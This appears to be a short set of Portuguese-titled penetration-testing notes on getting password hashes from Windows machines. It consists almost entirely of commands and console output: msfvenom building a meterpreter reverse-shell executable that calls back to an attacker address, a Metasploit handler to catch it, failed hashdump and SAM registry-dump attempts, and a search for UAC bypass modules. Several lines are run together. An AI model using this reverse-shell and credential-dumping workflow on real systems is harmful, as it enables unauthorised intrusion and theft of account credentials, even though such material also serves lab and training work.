Obtendo hashes em sistemas modernos
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.134 lport=443 -f exe > arq.exeuse exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <lhost>
set LPORT <lport>
exploitmeterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.C:\>reg save hklm\sam arqSam
ERROR: Access is denied.meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-MJHCOMS\trzwo @ DESKTOP-MJHCOM 192.168.2.134:666 -> 192.168.2.137:612
S 48 (192.168.2.137)
msf6 exploit(multi/handler) > search uacLast updated